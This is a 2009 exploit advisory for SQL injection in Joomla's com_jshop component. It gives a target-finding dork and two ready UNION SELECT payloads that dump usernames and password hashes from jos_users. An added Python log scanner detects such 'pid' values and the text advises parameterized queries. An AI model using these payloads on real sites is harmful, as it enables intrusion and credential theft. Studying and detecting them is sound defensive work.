/**************************************************************************

[~] Joomla Component com_jshop SQL Injection Vulnerability
[~] Author : Don Tukulesto (root@indonesiancoder.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : October 23, 2009
[~] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[+] Dork : inurl:"kaMtiEz"+"tukulesto"
[+] Price : FREE (Open Source Content Management)

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jshop&view=product&family=INDONESIANCODER&group=0&pid=[ExpL0!7]

[ ExpL0!7 ]

-12+union+select+6,6,@@version,concat(0x3a,username,password),6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6+from+jos_users--
-12/**/UNION/**/SELECT/**/6,username,concat(0x3a,username,password),@@version,6,6,6,6,6,6,6,6,6,6,6,6,6,password,6,6/**/from/**/jos_users/*
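
A defensive check for the `pid` parameter shown above, as an added example that is not part of the original advisory: it scans web access-log lines for `com_jshop` requests whose `pid` is not a plain integer or carries UNION/SELECT syntax. The rule that a legitimate `pid` is a short non-negative integer, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request part of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate product id is a short non-negative integer.
VALID_PID_RE = re.compile(r"\d{1,10}")
# UNION/SELECT split by whitespace or inline comments, plus markers from the advisory.
SQLI_RE = re.compile(r"union(?:\s|/\*.*?\*/)+select|@@version|jos_users", re.I)


def check_line(line):
    """Return (verdict, pid) for a com_jshop request, None for other lines."""
    m = REQUEST_RE.search(line)
    query = urlsplit(m.group(1)).query if m else ""
    params = parse_qs(query, keep_blank_values=True)  # decodes %xx and '+'
    if params.get("option", [""])[0].lower() != "com_jshop":
        return None
    pids = params.get("pid", [])  # every occurrence, not only the first
    for pid in pids:
        if SQLI_RE.search(pid):
            return ("sqli", pid)
    for pid in pids:
        if not VALID_PID_RE.fullmatch(pid):
            return ("invalid", pid)
    return ("ok", pids[0] if pids else None)


def scan(lines):
    """Return (line_number, verdict, pid) for every flagged line."""
    checked = ((n, check_line(line)) for n, line in enumerate(lines, 1))
    return [(n, *r) for n, r in checked if r and r[0] != "ok"]


# Constructed sample log lines (not taken from a real server).
LOG_TEMPLATE = '203.0.113.5 - - [23/Oct/2009:10:00:00 +0000] "GET /index.php?{} HTTP/1.1" 200 512'
JSHOP_QUERY = "option=com_jshop&view=product&group=0&pid="
SAMPLE_LOG = [LOG_TEMPLATE.format(q) for q in (
    JSHOP_QUERY + "12",
    JSHOP_QUERY + "-12+union+select+6,6",
    JSHOP_QUERY + "-12/**/UNION/**/SELECT/**/6",
    JSHOP_QUERY + "1%20UnIoN%2F%2A%2A%2FSeLeCt%201",
    JSHOP_QUERY + "12abc",
    "option=com_content&view=article&id=5",
)]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Log matching only surfaces attempts after the fact; the durable fix is for the component to treat `pid` as an integer and bind it in a parameterized query.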

===========================================================================

[ Thanks ]

[+] In the Name of ALLAH, Most Gracious, Most Merciful.
[+] INDONESIAN CODER TEAM - KILL-9 CREW - Anti Security - MainHack Brotherhood - ServerIsDown
[+] kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Jack-, Yadoy666
[+] Contrex, alsastrow, TUCKER, IAN PETRUCII, Cyb3r_tr0n, M364TR0N, Gonzhack, SAINT, Ronz
[+] XNITRO, DraCoola Multimedia, AWAN Bejat, Plaque, rey_cute, Gh4mb4s, noname, SurabayaHackerLink
[+] #nusantarahacker, #becak, #indonesiancoder, #kill-9, #becak, and YOU!!

[ NOTE ]

[!] The following procedures (methods) may contain something offensive
[!] Only for security research and teaching, at your own risk!

[ QUOTE ]

[+] Mom and Father and my sister, I love you
[+] Looking for the Lost Child ...
[+] When will I marry Sanny Aura Syahrani? O ALLAH, please help me!